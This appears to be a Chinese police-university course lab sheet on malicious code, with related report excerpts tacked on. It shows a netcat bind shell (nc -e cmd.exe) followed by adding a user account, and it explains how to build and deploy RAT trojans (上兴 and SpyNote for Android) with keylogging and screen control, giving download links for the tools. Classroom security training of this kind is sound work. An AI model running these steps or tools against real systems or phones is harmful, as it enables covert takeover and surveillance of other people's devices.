网络对抗技术实验四

Chinese people public security university

网络对抗技术

实验报告

 


实验四


恶意代码技术

 

 


学生姓名


李御瑾


年级


2015


区队


三区队


指导教师


高见

 

 

信息技术与网络安全学院

201810月17

 

实验任务总纲

2018—2019 学年 第  学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

任务一 利用NC控制电脑

NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

实验过程需要两个同学相互配合完成:

步骤一:

在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

步骤二:
  在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

步骤三:

在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

任务二 利用木马控制电脑

相关工具:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(备用,另外一个木马)

实验过程需要两个同学配合:

步骤一:

攻击者的机器. (同学A)IP地址为:192.168.163.128
打开上兴远程控制程序  生成木马sx.sever

步骤二:
  点击菜单栏中的“生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成服务端”按钮,生成木马服务端。

步骤三:

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。

可以查看到主机上线

步骤四:

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。

  1. 文件管理,尝试拷贝文件


  2. 屏幕控制,尝试获取桌面

3.键盘记录,尝试获取对方击键记录

4.会话管理,重启对方机器,查看是否能自启动上线

将主机关机后,主机下线

主机开机后上线

会话管理, 卸载对方的木马。

任务三 Android远控实践  所有过程截图写博客

 相关工具下载:

需要先安装.net framework4.0 (自行搜索下载)

spynote及环境工具:(解压密码rekings.com)

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

android模拟器:

https://www.yeshen.com/

http://mumu.163.com/

实验步骤:

一、攻击者打开spynote软件,该软件需要先安装.netframework4.0和jdk环境。

二、配置并打开监听端口

点击Listen Port,在弹出的对话框中输入端口号,并点击Add按钮,最后点击OK,成功监听本地端口。【本过程选用3210端口,实验过程大家可以自己选择端口】

三、配置并生成木马

(1)点击Build Client按钮,弹出对话框

(2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写3211端口。

(3)配置相关属性信息。

(4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

(5)完成后,自动打开APK生成所在的文件夹。

四、将木马安装在Android模拟其中。

五、在Spynote中控制手机

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

原文地址:https://www.cnblogs.com/p201521430034/p/9884815.html

时间: 2024-10-10 07:26:56

网络对抗技术实验四的相关文章

网络对抗技术 实验报告四

网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 李飞扬 年级 2014级 区队 二区队 指导教师 高见     信息技术与网络安全学院 2016年11月7日   实验任务总纲 2016-2017 学年 第 一 学期 一.实验目的 1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制:通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识. 2.了解并熟悉常用的网络攻击工具,木马的基本功能: 3.达到巩固课程知识和实际应用的目的.

网络对抗技术 实验一

实验报告一 学   号201421440025   中国人民公安大学  People Public Security University Of China 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 赵新桐 年级 2014 区队 网络安全与执法四区队 指导教师 高见     信息技术与网络安全学院 2017年7月7日 实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解

网络对抗技术—实验一实验报告

学   号:201421450005   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 王潜翔 年级 2014级 区队 网安五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎

网络对抗技术——实验一

中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 雷浩 年级 2014级 区队 五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎.扫描工具.社交网站等互联网资源,对给定的任务进

网络对抗技术—实验报告

1. 虚拟机安装与调试 附:vm12:http://www.zdfans.com/5928.html Windows xp :http://www.33lc.com/soft/3286.html#download_addr linux kali:https://www.kali.org/downloads/ 2. windows基本命令 Ping 主机可达 dir显示目录   cd 进入目录 Arp -a -d -s arp缓存 net share 查看计算机IPC$共享资源 netstat -

2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用

2017-2018-2 20155228 <网络对抗技术> 实验四:MSF基础应用 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1 一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣

20165309 《网络对抗技术》实验六:信息搜集与漏洞扫描

20165309 <网络对抗技术>实验六:信息搜集与漏洞扫描 1.基础问题回答 (1)哪些组织负责DNS,IP的管理. (2)什么是3R信息. (3)评价下扫描结果的准确性. 2.实践总结与体会 (1)遇到的问题与解决 (2)实验感受 3.实践过程记录 (0)准备工作 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点(以自己主机为目标) (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为

20155201 李卓雯 《网络对抗技术》实验一 逆向及Bof基础

20155201 李卓雯 <网络对抗技术>实验一 逆向及Bof基础 一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串. 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell.正常情况下这个代码是不会被运行的.我们实践的目标就是想办法运行这个代码片段.我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode. 三个实践内容如下: 手工修改可执行文

20155231 邵煜楠《网络对抗技术》实验一 PC平台逆向破解

20155231 邵煜楠<网络对抗技术>实验一 PC平台逆向破解 实验内容 直接修改程序机器指令,改变程序执行流程: 通过构造输入参数,造成BOF攻击,改变程序执行流: 注入Shellcode并执行. 实验步骤 一: 下载目标文件pwn1,反汇编 利用 objdump -d pwn1 对pwn1进行反汇编: 用vi pwn1打开pwn1: 利用%!xxd将文件转换成16进制显示,利用/e8 d7ff ffff进行搜索将d7改为c3(计算"0804847d(getshell)-0804